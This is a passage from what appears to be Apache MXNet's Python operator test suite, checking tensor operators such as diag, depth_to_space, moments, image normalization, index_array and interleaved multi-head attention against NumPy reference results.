assert_almost_equal(r, np.diagonal(a_np, offset=2, axis1=-2, axis2=0))
# Test 4d backward, k=0, axis1=3, axis2=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=0, axis1=3, axis2=0)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d backward, k=1, axis1=1, axis2=2
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=1, axis1=1, axis2=2)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d backward, k=-1, axis1=2, axis2=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-1, axis1=2, axis2=0)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d backward, k=-2, axis1=1, axis2=-1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-2, axis1=1, axis2=-1)
check_numeric_gradient(diag_sym, [a_np])
@with_seed()
@pytest.mark.serial
def test_depthtospace():
def f(x, blocksize):
b, c, h, w = x.shape[0], x.shape[1], x.shape[2], x.shape[3]
tmp = np.reshape(x, [b, blocksize, blocksize, c // (blocksize**2), h, w])
tmp = np.transpose(tmp, [0, 3, 4, 1, 5, 2])
y = np.reshape(tmp, [b, c // (blocksize**2), h * blocksize, w * blocksize])
return y
block = random.randint(2, 4)
rand_mul1 = random.randint(1, 4)
n = random.randint(1, 5)
c = block * block * rand_mul1
h = random.randint(1, 5)
w = random.randint(1, 5)
shape_inp = (n, c, h, w)
data = rand_ndarray(shape_inp, 'default')
data_np = data.asnumpy()
expected = f(data_np, block)
output = mx.nd.depth_to_space(data, block)
assert_almost_equal(output, expected, atol=1e-3, rtol=1e-3)
shape_out = (n, c // (block ** 2), h * block, w * block)
data = mx.sym.Variable('data')
dts_sym = mx.sym.depth_to_space(data, block)
check_numeric_gradient(dts_sym, [np.ones(shape_inp)])
check_symbolic_forward(dts_sym, [data_np], [expected])
check_symbolic_backward(dts_sym, [data_np], [np.ones(shape_out)], [np.ones(shape_inp)])
def test_invalid_depth_dim():
invalid_shape_inp = (n, block - 1, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.depth_to_space, data, block)
def test_invalid_space_dim():
invalid_shape_inp = (n, block ** 2, 0, block + 1)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.depth_to_space, data, block)
def test_invalid_block_size():
block = 0
invalid_shape_inp = (n , c, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.depth_to_space, data, block)
test_invalid_depth_dim()
test_invalid_space_dim()
test_invalid_block_size()
@with_seed()
@pytest.mark.serial
def test_spacetodepth():
def f(x, blocksize):
b, c, h, w = x.shape[0], x.shape[1], x.shape[2], x.shape[3]
tmp = np.reshape(x, [b, c, h // blocksize, blocksize, w // blocksize, blocksize])
tmp = np.transpose(tmp, [0, 3, 5, 1, 2, 4])
y = np.reshape(tmp, [b, c * (blocksize**2), h // blocksize, w // blocksize])
return y
block = random.randint(2, 4)
rand_mul1 = random.randint(1, 4)
rand_mul2 = random.randint(1, 4)
n = random.randint(1, 5)
c = random.randint(1, 5)
h = block * rand_mul1
w = block * rand_mul2
shape_inp = (n, c, h, w)
data = rand_ndarray(shape_inp, 'default')
data_np = data.asnumpy()
expected = f(data_np, block)
output = mx.nd.space_to_depth(data, block)
assert_almost_equal(output, expected, atol=1e-3, rtol=1e-3)
shape_out = (n, c * (block ** 2), h // block, w // block)
data = mx.sym.Variable('data')
dts_sym = mx.sym.space_to_depth(data, block)
check_numeric_gradient(dts_sym, [np.ones(shape_inp)])
check_symbolic_forward(dts_sym, [data_np], [expected])
check_symbolic_backward(dts_sym, [data_np], [np.ones(shape_out)], [np.ones(shape_inp)])
def test_invalid_space_dim():
invalid_shape_inp = (n , c, block - 1, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.space_to_depth, data, block)
def test_invalid_block_size():
block = 0
invalid_shape_inp = (n, c, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.space_to_depth, data, block)
def test_invalid_depth_dim():
invalid_shape_inp = (n, 0, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.space_to_depth, data, block)
test_invalid_space_dim()
test_invalid_block_size()
test_invalid_depth_dim()
@with_seed()
def test_softmax_cross_entropy():
def f_sm_ce(data, label):
return np.sum(-np.log(data) * label)
data = mx.sym.Variable('data')
label = mx.sym.Variable('label')
sym = mx.sym.softmax_cross_entropy(data=data, label=label)
num_labels = random.randint(100, 200)
batch_size = random.randint(100, 200)
np_data = rand_ndarray((batch_size, num_labels), stype='default').asnumpy()
np_sm = np_softmax(np_data)
np_label = np.random.randint(0, num_labels, (batch_size, ))
np_one_hot_label = np.zeros((batch_size, num_labels))
np_one_hot_label[np.arange(batch_size), np_label] = 1.
check_symbolic_forward(sym, {'data' : np_data, 'label' : np_label}, [np.array([f_sm_ce(np_sm, np_one_hot_label)])], rtol=1e-3, atol=1e-5)
@with_seed()
def test_split_v2():
dim = random.randint(2, 6)
shape = rand_shape_nd(dim)
axis = random.randint(-dim, dim-1)
axis_size = shape[axis]
samples = random.randint(0, axis_size - 1)
indices = sorted(random.sample([i for i in range(1, axis_size)], samples))
indices = tuple(indices)
mx_data = rand_ndarray(shape)
np_data = mx_data.asnumpy()
np_out = np.split(np_data, indices_or_sections=indices, axis=axis)
data = mx.sym.Variable("data")
sym = mx.sym.split_v2(data, indices_or_sections=indices, axis=axis)
check_symbolic_forward(sym, {"data": mx_data}, np_out, rtol=1e-3, atol=1e-5)
out_grad = [np.ones(arr.shape) for arr in np_out]
check_symbolic_backward(sym, {"data": mx_data}, out_grad, [np.concatenate(out_grad, axis=axis)])
@with_seed()
def test_moments():
dim = random.randint(2, 5)
shape = rand_shape_nd(dim, dim=5)
axes = [i for i in range(dim)]
test_dims = random.sample(axes, random.randint(1, dim))
test_axes = tuple(sorted(test_dims))
np_a = np.random.uniform(-1.0, 1.0, shape)
a = mx.nd.array(np_a)
for keepdims in [True, False]:
eps = 1e-3
np_a[abs(np_a) < eps] = 2 * eps
np_mean = np.mean(np_a, axis=test_axes, keepdims=keepdims)
np_var = np.var(np_a, axis=test_axes, keepdims=keepdims)
mx_mean, mx_var = mx.nd.moments(a, keepdims=keepdims, axes=test_axes)
N = np_a.size / np_mean.size
mx_sym = mx.sym.Variable("data")
mx_moments = mx.sym.moments(mx_sym, axes=test_axes, keepdims=keepdims)
mx_test_sym = mx.sym.elemwise_add(mx_moments[0], mx_moments[1])
if len(np_mean.shape) == 0:
np_mean = np_mean.reshape(mx_mean.shape)
np_var = np_var.reshape(mx_var.shape)
assert np_mean.shape == mx_mean.shape
assert np_var.shape == mx_var.shape
check_symbolic_forward(mx_test_sym, [np_a], [np_mean + np_var], rtol=1e-3, atol=1e-5)
check_numeric_gradient(mx_test_sym, [np_a], numeric_eps=eps, rtol=1e-2, atol=2e-4)
@with_seed()
def test_invalid_kernel_size():
invalid_kernel_size = 28
assert_exception(
mx.nd.Correlation,
MXNetError,
mx.nd.array(np.random.rand(1, 1, 28, 28)),
mx.nd.array(np.random.rand(1, 1, 28, 28)),
kernel_size=invalid_kernel_size)
@with_seed()
def test_valid_kernel_size():
valid_kernel_size = 9
mx.nd.Correlation(
mx.nd.array(np.random.rand(1, 1, 28, 28)),
mx.nd.array(np.random.rand(1, 1, 28, 28)),
kernel_size=valid_kernel_size)
@with_seed()
def test_valid_max_pooling_pad_type_same():
import math
input_data = mx.nd.array(np.random.rand(1,1,10))
stride = 2
kernel = 2
output_data=mx.nd.Pooling(
input_data,
kernel=kernel,
stride=stride,
pad=(0,0,0),
pool_type='max',
name='pooling',
pooling_convention="same")
assert(math.ceil(input_data.shape[2]/stride) == output_data.shape[2])
@with_seed()
def test_invalid_max_pooling_pad_type_same():
import math
input_data = mx.nd.array(np.random.rand(1,1,10))
stride = 2
kernel = 2
pad = 2
assert_exception(
mx.nd.Pooling,
MXNetError,
input_data,
stride=stride,
kernel=kernel,
pad=pad,
pool_type='max',
name='pooling',
pooling_convention="same")
@with_seed()
@pytest.mark.serial
def test_image_normalize():
# Part 1 - Test 3D input with 3D mean/std
shape_3d = (3, 28, 28)
mean = (0, 1, 2)
std = (3, 2, 1)
data_in_3d = mx.nd.random.uniform(0, 1, shape_3d)
data_expected_3d = data_in_3d.asnumpy()
data_expected_3d[:][:][0] = data_expected_3d[:][:][0] / 3.0
data_expected_3d[:][:][1] = (data_expected_3d[:][:][1] - 1.0) / 2.0
data_expected_3d[:][:][2] = data_expected_3d[:][:][2] - 2.0
data = mx.symbol.Variable('data')
img_norm_sym = mx.sym.image.normalize(data=data, mean=mean, std=std)
# check forward
check_symbolic_forward(img_norm_sym, [data_in_3d], [data_expected_3d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_3d = np.ones(shape_3d)
grad_expected_3d[:][:][0] = 1 / 3.0
grad_expected_3d[:][:][1] = 1 / 2.0
grad_expected_3d[:][:][2] = 1 / 1.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_3d], out_grads=[mx.nd.ones(shape_3d)],
expected=[grad_expected_3d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_3d], atol=0.001)
# Part 2 - Test 4D input with 3D mean/std
shape_4d = (2, 3, 28, 28)
data_in_4d = mx.nd.random.uniform(0, 1, shape_4d)
data_expected_4d = data_in_4d.asnumpy()
data_expected_4d[0][:][:][0] = data_expected_4d[0][:][:][0] / 3.0
data_expected_4d[0][:][:][1] = (data_expected_4d[0][:][:][1] - 1.0) / 2.0
data_expected_4d[0][:][:][2] = data_expected_4d[0][:][:][2] - 2.0
data_expected_4d[1][:][:][0] = data_expected_4d[1][:][:][0] / 3.0
data_expected_4d[1][:][:][1] = (data_expected_4d[1][:][:][1] - 1.0) / 2.0
data_expected_4d[1][:][:][2] = data_expected_4d[1][:][:][2] - 2.0
# check forward
check_symbolic_forward(img_norm_sym, [data_in_4d], [data_expected_4d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_4d = np.ones(shape_4d)
grad_expected_4d[0][:][:][0] = 1 / 3.0
grad_expected_4d[0][:][:][1] = 1 / 2.0
grad_expected_4d[0][:][:][2] = 1 / 1.0
grad_expected_4d[1][:][:][0] = 1 / 3.0
grad_expected_4d[1][:][:][1] = 1 / 2.0
grad_expected_4d[1][:][:][2] = 1 / 1.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_4d], out_grads=[mx.nd.ones(shape_4d)],
expected=[grad_expected_4d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_4d], atol=0.001)
# Part 3 - Test 3D input with scalar mean/std
shape_3d = (3, 28, 28)
mean = 1.0
std = 2.0
data_in_3d = mx.nd.random.uniform(0, 1, shape_3d)
data_expected_3d = data_in_3d.asnumpy()
data_expected_3d[:][:][:] = (data_expected_3d[:][:][:] - 1.0) / 2.0
data = mx.symbol.Variable('data')
img_norm_sym = mx.sym.image.normalize(data=data, mean=mean, std=std)
# check forward
check_symbolic_forward(img_norm_sym, [data_in_3d], [data_expected_3d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_3d = np.ones(shape_3d)
grad_expected_3d[:][:][:] = 1 / 2.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_3d], out_grads=[mx.nd.ones(shape_3d)],
expected=[grad_expected_3d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_3d], atol=0.001)
# Part 4 - Test 4D input with scalar mean/std
shape_4d = (2, 3, 28, 28)
data_in_4d = mx.nd.random.uniform(0, 1, shape_4d)
data_expected_4d = data_in_4d.asnumpy()
data_expected_4d[:][:][:][:] = (data_expected_4d[:][:][:][:] - 1.0) / 2.0
# check forward
check_symbolic_forward(img_norm_sym, [data_in_4d], [data_expected_4d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_4d = np.ones(shape_4d)
grad_expected_4d[:][:][:][:] = 1 / 2.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_4d], out_grads=[mx.nd.ones(shape_4d)],
expected=[grad_expected_4d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_4d], atol=0.001)
@with_seed()
@pytest.mark.serial
def test_index_array():
def test_index_array_default():
for shape in [(10,), (7, 5, 29), (5, 7, 11, 13, 17, 19)]:
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data)
input_array = np.ones(shape)
mgrid = np.mgrid[tuple(slice(0, x) for x in shape)]
expected = np.stack(mgrid, axis=-1)
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
@mx.use_np_shape
def test_index_array_default_zero_dim():
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data)
input_array = np.ones(())
expected = np.zeros((0,))
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
@mx.use_np_shape
def test_index_array_default_zero_size():
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data)
input_array = np.ones((0, 0, 0))
expected = np.zeros((0, 0, 0, 3))
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
def test_index_array_select_axes():
shape = (5, 7, 11, 13, 17, 19)
for axes in [(3,), (4, 1), (5, 1, 3), (-1,), (-5, -1, -3)]:
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data, axes=axes)
input_array = np.ones(shape)
mgrid = np.mgrid[tuple(slice(0, x) for x in shape)]
expected = np.stack(mgrid, axis=-1)[..., axes]
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
@mx.use_np_shape
def test_index_array_select_axes_zero_size():
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data, axes=(2, 1))
input_array = np.ones((0, 0, 0, 0))
expected = np.zeros((0, 0, 2))
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
test_index_array_default()
test_index_array_default_zero_dim()
test_index_array_default_zero_size()
test_index_array_select_axes()
test_index_array_select_axes_zero_size()
@with_seed()
def test_scalar_tensor_creation():
assertRaises(MXNetError, mx.nd.zeros, shape=())
assertRaises(MXNetError, mx.nd.ones, shape=())
with mx.np_shape():
data_mx = mx.nd.ones(shape=())
data_np = np.ones((), dtype=data_mx.dtype)
assert same(data_mx.asnumpy(), data_np)
@with_seed()
def test_zero_size_tensor_creation():
assertRaises(MXNetError, mx.nd.zeros, shape=(0, 1, 3, 0))
assertRaises(MXNetError, mx.nd.ones, shape=(0, 1, 3, 0))
with mx.np_shape():
data_mx = mx.nd.ones(shape=(0, 1, 0, 4))
data_np = np.ones(shape=data_mx.shape, dtype=data_mx.dtype)
assert same(data_mx.asnumpy(), data_np)
@with_seed()
def test_concat_with_zero_size_tensor():
with mx.np_shape():
data1 = mx.nd.ones((0, 8, 12))
data2 = mx.nd.ones((3, 8, 12))
data3 = mx.nd.ones((0, 8, 12))
ret = mx.nd.Concat(data1, data2, data3, dim=0)
assert ret.shape == (3, 8, 12)
data1 = mx.nd.ones((0, 3, 10))
data2 = mx.nd.ones((0, 4, 10))
data3 = mx.nd.ones((0, 5, 10))
ret = mx.nd.Concat(data1, data2, data3, dim=1)
assert ret.shape == (0, 12, 10)
@with_seed()
def test_np_shape_decorator():
@mx.use_np_shape
def check_scalar_one():
"""Generate scalar one tensor"""
return mx.nd.ones(shape=())
assert check_scalar_one.__name__ == "check_scalar_one"
assert check_scalar_one.__doc__ == "Generate scalar one tensor"
assert check_scalar_one().shape == ()
for active in [True, False]:
with mx.np_shape(active=active):
assert check_scalar_one.__name__ == "check_scalar_one"
assert check_scalar_one.__doc__ == "Generate scalar one tensor"
assert check_scalar_one().shape == ()
@mx.use_np_shape
def check_concat(shape1, shape2, axis):
data1 = mx.nd.ones(shape1)
data2 = mx.nd.ones(shape2)
ret = mx.nd.Concat(data1, data2, dim=axis)
expected_ret = np.concatenate((data1.asnumpy(), data2.asnumpy()), axis=axis)
assert ret.shape == expected_ret.shape
check_concat((0, 3, 4), (5, 3, 4), 0)
check_concat((8, 0, 5), (8, 7, 5), 1)
check_concat((8, 0, 0), (8, 0, 0), 2)
for active in [True, False]:
check_concat((0, 3, 4), (5, 3, 4), 0)
check_concat((8, 0, 5), (8, 7, 5), 1)
check_concat((8, 0, 0), (8, 0, 0), 2)
@with_seed()
def test_add_n():
data_shape = (2, 2)
input_num = 5
data = [mx.nd.random.uniform(shape=data_shape) for i in range(input_num)]
rslt = mx.nd.zeros(shape=data_shape)
for i in range(input_num):
rslt += data[i]
add_n_rslt = mx.nd.add_n(*data, out=data[0])
assert_almost_equal(rslt.asnumpy(), add_n_rslt.asnumpy(), atol=1e-5)
def test_get_all_registered_operators():
ops = get_all_registered_operators()
assert isinstance(ops, list)
assert len(ops) > 0
assert 'Activation' in ops
def test_get_operator_arguments():
operator_arguments = get_operator_arguments('Activation')
assert isinstance(operator_arguments, OperatorArguments)
assert operator_arguments.names == ['data', 'act_type']
assert operator_arguments.types \
== ['NDArray-or-Symbol', "{'relu', 'sigmoid', 'softrelu', 'softsign', 'tanh'}, required"]
assert operator_arguments.narg == 2
def test_transpose_infer_shape_back():
o1 = mx.sym.ones(shape=[2,3])
o2 = mx.sym.ones(shape=[-1,-1])
t = mx.sym.transpose(o2)
b = o1 + t
x = b.bind(mx.cpu(), args={})
y = x.forward()
assert(y[0].shape == (2,3))
def test_transpose_infer_shape_mixed():
o1 = mx.sym.ones(shape=[2,-1])
o2 = mx.sym.ones(shape=[3,-1])
t = mx.sym.transpose(o2)
b = o1 + t
x = b.bind(mx.cpu(), args={})
y = x.forward()
assert(y[0].shape == (2,3))
@with_seed()
def test_sample_normal_default_shape():
# Test case from https://github.com/apache/incubator-mxnet/issues/16135
s = mx.nd.sample_normal(mu=mx.nd.array([10.0]), sigma=mx.nd.array([0.5]))
assert s.shape == (1,)
s = mx.nd.sample_normal(mu=mx.nd.array([10.0]), sigma=mx.nd.array([0.5]), shape=())
assert s.shape == (1,)
s = mx.nd.sample_normal(mu=mx.nd.array([10.0]), sigma=mx.nd.array([0.5]), shape=1)
assert s.shape == (1, 1)
s = mx.nd.sample_normal(mu=mx.nd.array([10.0]), sigma=mx.nd.array([0.5]), shape=(1,))
assert s.shape == (1, 1)
def test_large_tensor_disabled_err_msg():
LARGE_X = 4300000000
MEDIUM_X = 1000000000
SMALL_Y = 1
shape = (2, LARGE_X)
def check_nd_array():
x = np.arange(0, LARGE_X)
assertRaises(MXNetError, mx.nd.array, x)
def check_nd_ones():
assertRaises(MXNetError, mx.nd.ones, shape)
def check_nd_zeros():
assertRaises(MXNetError, mx.nd.zeros, shape)
def check_nd_full():
val = 1
assertRaises(Exception, mx.nd.full, shape, val)
def check_nd_arange():
start = 0
stop = LARGE_X
assertRaises(Exception, mx.nd.arange, start, stop)
def check_nd_random():
shape = (2, LARGE_X)
def check_random_exp():
lam = 4
assertRaises(MXNetError, mx.nd.random_exponential, lam, shape)
def check_random_gamma():
alpha = 9
beta = 0.5
assertRaises(MXNetError, mx.nd.random_gamma, alpha, beta, shape)
def check_random_normal():
loc = 0
scale = 1
assertRaises(MXNetError, mx.nd.random_normal, loc, scale, shape)
def check_random_poisson():
lam = 4
assertRaises(MXNetError, mx.nd.random_poisson, alpha, lam, shape)
def check_random_randint():
low = 0
high = 1000000
assertRaises(MXNetError, mx.nd.random_randint, low, high, shape)
def check_random_uniform():
low = 0
hight = 1
assertRaises(MXNetError, mx.nd.random_uniform, alpha, beta, shape)
def check_multihead_attention_selfatt(dtype):
def convert_weight(F, q_weight, k_weight, v_weight, num_heads):
q_weight = F.reshape(q_weight, shape=(num_heads, -1, 0), reverse=True)
k_weight = F.reshape(k_weight, shape=(num_heads, -1, 0), reverse=True)
v_weight = F.reshape(v_weight, shape=(num_heads, -1, 0), reverse=True)
all_weights = F.concat(q_weight, k_weight, v_weight, dim=-2)
all_weights = F.reshape(all_weights, shape=(-1, 0), reverse=True)
return all_weights
def convert_bias(F, q_bias, k_bias, v_bias, num_heads):
q_bias = F.reshape(q_bias, shape=(num_heads, -1))
k_bias = F.reshape(k_bias, shape=(num_heads, -1))
v_bias = F.reshape(v_bias, shape=(num_heads, -1))
all_bias = F.stack(q_bias, k_bias, v_bias, axis=1)
all_bias = F.reshape(all_bias, shape=(-1,))
return all_bias
batch_size = 2
qkv_length = 7 # length of a sequence
qkv_dim = 9 # dimension of encoding
num_heads = 3 # number of attention head
head_dim = 5 # head size
out_dim = 13 * num_heads
qkv_units = num_heads * head_dim
arg_params = {
'qkv': mx.nd.array(np.random.rand(*(batch_size, qkv_length, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'q_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'k_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'v_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'q_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'k_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'v_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'out_weight': mx.nd.array(np.random.rand(*(out_dim, qkv_units)).astype(dtype) * 0.1, dtype=dtype),
'out_bias': mx.nd.array(np.random.rand(*(out_dim,)).astype(dtype) * 0.1, dtype=dtype),
}
qkv = mx.sym.Variable('qkv')
sonde = mx.sym.Variable('sonde')
q_weight = mx.sym.Variable('q_weight')
k_weight = mx.sym.Variable('k_weight')
v_weight = mx.sym.Variable('v_weight')
q_bias = mx.sym.Variable('q_bias')
k_bias = mx.sym.Variable('k_bias')
v_bias = mx.sym.Variable('v_bias')
out_weight = mx.sym.Variable('out_weight')
out_bias = mx.sym.Variable('out_bias')
qkv_weight = convert_weight(mx.sym, q_weight, k_weight, v_weight, num_heads)
qkv_bias = convert_bias(mx.sym, q_bias, k_bias, v_bias, num_heads)
qkv = mx.sym.transpose(qkv, axes=(1, 0, 2))
qkv_proj = mx.sym.FullyConnected(qkv, weight=qkv_weight, bias=qkv_bias, flatten=False,
num_hidden=qkv_units * 3, no_bias=False)
att_score = mx.sym.contrib.interleaved_matmul_selfatt_qk(
qkv_proj, heads=num_heads)
att_score = att_score + sonde
weighted_value = mx.sym.contrib.interleaved_matmul_selfatt_valatt(
qkv_proj, att_score, heads=num_heads)
output = mx.sym.FullyConnected(weighted_value, weight=out_weight, bias=out_bias, flatten=False,
num_hidden=out_dim, no_bias=False)
output = mx.sym.transpose(output, axes=(1, 0, 2))
output = mx.sym.Group([output, att_score])
executor = output.simple_bind(ctx=default_context(),
qkv=(batch_size, qkv_length, qkv_dim),
q_weight=(qkv_units, qkv_dim),
q_bias=(qkv_units,),
k_weight=(qkv_units, qkv_dim),
k_bias=(qkv_units,),
v_weight=(qkv_units, qkv_dim),
v_bias=(qkv_units,),
type_dict={'qkv': dtype,
'q_weight': dtype,
'k_weight': dtype,
'v_weight': dtype,
'q_bias': dtype,
'k_bias': dtype,
'v_bias': dtype,
'sonde': dtype},
grad_req='write', force_rebind=True)
output_shape = executor.outputs[0].shape
output_grads = np.random.rand(*output_shape).astype(dtype) * 0.1
executor.copy_params_from(arg_params, {})
executor.arg_dict['sonde'][:] = 0.
executor.arg_dict['sonde'].wait_to_read()
executor.forward(is_train=True)
output_opti = executor.outputs[0].asnumpy()
att_score_opti = executor.outputs[1].asnumpy()
executor.backward([mx.nd.array(output_grads, dtype=dtype),
mx.nd.zeros(att_score_opti.shape, dtype=dtype)])
grads_opti = {k: v.asnumpy() for k, v in executor.grad_dict.items()}
qkv = mx.sym.Variable('qkv')
sonde = mx.sym.Variable('sonde')
q_weight = mx.sym.Variable('q_weight')
k_weight = mx.sym.Variable('k_weight')
v_weight = mx.sym.Variable('v_weight')
q_bias = mx.sym.Variable('q_bias')
k_bias = mx.sym.Variable('k_bias')
v_bias = mx.sym.Variable('v_bias')
out_weight = mx.sym.Variable('out_weight')
out_bias = mx.sym.Variable('out_bias')
q = mx.sym.FullyConnected(qkv, weight=q_weight, bias=q_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
k = mx.sym.FullyConnected(qkv, weight=k_weight, bias=k_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
v = mx.sym.FullyConnected(qkv, weight=v_weight, bias=v_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
q = mx.sym.reshape(q, shape=(0, 0, num_heads, -1))
q = mx.sym.transpose(q, axes=(0, 2, 1, 3))
q = mx.sym.reshape(q, shape=(-1, 0, 0), reverse=True)
k = mx.sym.reshape(k, shape=(0, 0, num_heads, -1))
k = mx.sym.transpose(k, axes=(0, 2, 1, 3))
k = mx.sym.reshape(k, shape=(-1, 0, 0), reverse=True)
q = mx.sym.contrib.div_sqrt_dim(q)
att_score = mx.sym.batch_dot(q, k, transpose_b=True)
att_score = att_score + sonde
v = mx.sym.reshape(v, shape=(0, 0, num_heads, -1))
v = mx.sym.transpose(v, axes=(0, 2, 1, 3))
v = mx.sym.reshape(v, shape=(-1, 0, 0), reverse=True)
weighted_value = mx.sym.batch_dot(att_score, v)
weighted_value = mx.sym.reshape(weighted_value, shape=(-1, num_heads, 0, 0),
reverse=True)
weighted_value = mx.sym.transpose(weighted_value, axes=(0, 2, 1, 3))
weighted_value = mx.sym.reshape(weighted_value, shape=(0, 0, -1))
output = mx.sym.FullyConnected(weighted_value, weight=out_weight, bias=out_bias, flatten=False,
num_hidden=out_dim, no_bias=False)
output = mx.sym.Group([output, att_score])
executor = output.simple_bind(ctx=default_context(),
qkv=(batch_size, qkv_length, qkv_dim),
type_dict={'qkv': dtype},
grad_req='write', force_rebind=True)
executor.copy_params_from(arg_params, {})
executor.arg_dict['sonde'][:] = 0.
executor.arg_dict['sonde'].wait_to_read()
executor.forward(is_train=True)
output_orig = executor.outputs[0].asnumpy()
att_score_orig = executor.outputs[1].asnumpy()
executor.backward([mx.nd.array(output_grads, dtype=dtype),
mx.nd.zeros(att_score_orig.shape, dtype=dtype)])
grads_orig = {k : v.asnumpy() for k, v in executor.grad_dict.items()}
assert_allclose(att_score_orig, att_score_opti, rtol=1e-2, atol=1e-3)
assert_allclose(output_orig, output_opti, rtol=1e-2, atol=1e-3)
for k in grads_opti.keys():
assert(grads_orig[k].dtype == grads_opti[k].dtype)
assert(grads_orig[k].shape == grads_opti[k].shape)
assert_allclose(grads_orig[k], grads_opti[k], rtol=1e-2, atol=1e-3)
@with_seed()
@assert_raises_cuda_not_satisfied(min_version='9.1')
@pytest.mark.serial
def test_multihead_attention_selfatt():
dtypes = ['float32']
if default_context().device_type == 'gpu':
dtypes += ['float16']
for dtype in dtypes:
check_multihead_attention_selfatt(dtype=dtype)
def check_multihead_attention_encdec(dtype):
def convert_weight(F, k_weight, v_weight, num_heads):
k_weight = F.reshape(k_weight, shape=(num_heads, -1, 0), reverse=True)
v_weight = F.reshape(v_weight, shape=(num_heads, -1, 0), reverse=True)
all_weights = F.concat(k_weight, v_weight, dim=-2)
all_weights = F.reshape(all_weights, shape=(-1, 0), reverse=True)
return all_weights
def convert_bias(F, k_bias, v_bias, num_heads):
k_bias = F.reshape(k_bias, shape=(num_heads, -1))
v_bias = F.reshape(v_bias, shape=(num_heads, -1))
all_bias = F.stack(k_bias, v_bias, axis=1)
all_bias = F.reshape(all_bias, shape=(-1,))
return all_bias
batch_size = 2
qkv_length = 7 # length of a sequence
qkv_dim = 9 # dimension of encoding
num_heads = 3 # number of attention head
head_dim = 5 # head size
out_dim = 13 * num_heads
qkv_units = num_heads * head_dim
arg_params = {
'q': mx.nd.array(np.random.rand(*(batch_size, qkv_length, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'kv': mx.nd.array(np.random.rand(*(batch_size, qkv_length, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'q_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'k_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'v_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'q_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'k_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'v_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'out_weight': mx.nd.array(np.random.rand(*(out_dim, qkv_units)).astype(dtype) * 0.1, dtype=dtype),
'out_bias': mx.nd.array(np.random.rand(*(out_dim,)).astype(dtype) * 0.1, dtype=dtype),
}
q = mx.sym.Variable('q')
kv = mx.sym.Variable('kv')
sonde = mx.sym.Variable('sonde')
q_weight = mx.sym.Variable('q_weight')
k_weight = mx.sym.Variable('k_weight')
v_weight = mx.sym.Variable('v_weight')
q_bias = mx.sym.Variable('q_bias')
